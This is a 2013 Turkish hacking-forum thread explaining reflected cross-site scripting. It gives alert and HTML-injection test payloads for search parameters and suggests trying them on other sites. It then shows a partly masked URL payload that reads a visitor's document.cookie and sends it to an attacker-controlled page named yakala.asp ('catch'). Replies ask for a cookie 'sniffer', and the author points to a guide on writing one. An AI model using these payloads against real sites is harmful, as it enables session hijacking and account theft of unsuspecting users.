İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

XSS=Cross Site Scripting Açığı

07-07-2013 22:51
#1
WhooLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hunger Games
Mesajlar:
1.700
Teşekkür (Etti):
795
Teşekkür (Aldı):
420
Konular:
152
Ticaret:
(0) %
Selamun Aleyküm

Xss açığını bilmeyen arkadaşlarımız vardır hemen başlayalım.

En yaygın olanı **********alert("BeylerBey!")</script>

Eğer sitede Xss açığı var ise popup ikazı verecektir.

Örnek Vermek Gerekirse;

site.com/search.php?q=</script>alert("BeylerBey!")</script>

Büyük bir olasılıkla çalışacaktır ancak yinede çalışmazsa sorun değil, başka sitelerde deneyebilirsiniz.

site.com/search.php?q=<br><br><b><u>BeylerBey!</u></b>


XSS Açıkları Request ile kullanıcıdan alınan verilerin sayfa içinde Yazdırılması ile oluşur.

site.com/Default.Asp?Page=1
site.com/Product.Asp?id=1
site.com/Default.Asp?Kategori=BeylerBey!

Örnek XSS Açığı ile Ne yapılabilir :

Yukaradaki vermiş olduğum örnekler gibi site açığımızı buluyoruz.

Açığımızı bulduktan sonra kullanıcının Cookie’sini JavaScript ile okuyup istediğimiz bir adresteki veritabanına kayıt ediyoruz yada kendimize mail atıyoruz.

Örnek Vermek Gerekirse;
-------------------------
site.com/Default.Asp?Page=2">******************.href= "http://www.site.com/yakala.asp?X=’+escape(********.cookie)</SCRIPT>
Saldıracak olan kişi Url’nin sonuna > Eklentisi ile inputların sonlandırılmasını ve bundan sonra eklenen zararlı kodların sonlamasını ikaz eder.
Kişi üsteki linke tıkladıktan sonra Cookie Bilgileri Post Edilir.
Saygılarımla.

Bir Sonraki Mesajımda Kapatma Hakkında Bilgi Vermek İsterim.

Selam ve Dua İle
Kullanıcı İmzası
Allah'a Emanet kardeşlerim ,abilerim.

Duydumki LeBlanc nerf atmışsın rito ama unutmaki babanın s4de 2000 LeBlanc oyunu var.

The Master of LeBlanc.
Cshoner, Unauthorized Teşekkür etti.

07-07-2013 22:53
#2
Cshoner - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2012
Nereden:
TURKIYE
Mesajlar:
1.204
Teşekkür (Etti):
33
Teşekkür (Aldı):
157
Konular:
631
Ticaret:
(0) %
Eyvallah. Xss Sniffer Varmı Bildiğin?
Kullanıcı İmzası
Aşk Bazıları İçin 3 Harflidir THT
07-07-2013 23:18
#3
Üyelik tarihi:
04/2013
Mesajlar:
68
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
27
Ticaret:
(0) %
Eyvallah. Xss Sniffer Varmı Bildiğin?
08-07-2013 19:00
#4
WhooLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hunger Games
Mesajlar:
1.700
Teşekkür (Etti):
795
Teşekkür (Aldı):
420
Konular:
152
Ticaret:
(0) %
Alıntı:
Cshoner´isimli üyeden Alıntı Mesajı göster
Eyvallah. Xss Sniffer Varmı Bildiğin?
Bence kendi snifferini kullan hazır sniffer kullanma derim.PHP ile XSS için Sniffer Yazma – Sesli | Ahmet KOTAN - Web Güvenlik Uzmanı
Kullanıcı İmzası
Allah'a Emanet kardeşlerim ,abilerim.

Duydumki LeBlanc nerf atmışsın rito ama unutmaki babanın s4de 2000 LeBlanc oyunu var.

The Master of LeBlanc.
08-07-2013 19:13
#5
sykhmz15 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
764
Teşekkür (Etti):
172
Teşekkür (Aldı):
82
Konular:
198
Ticaret:
(0) %
anladıysam arap oliyim

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı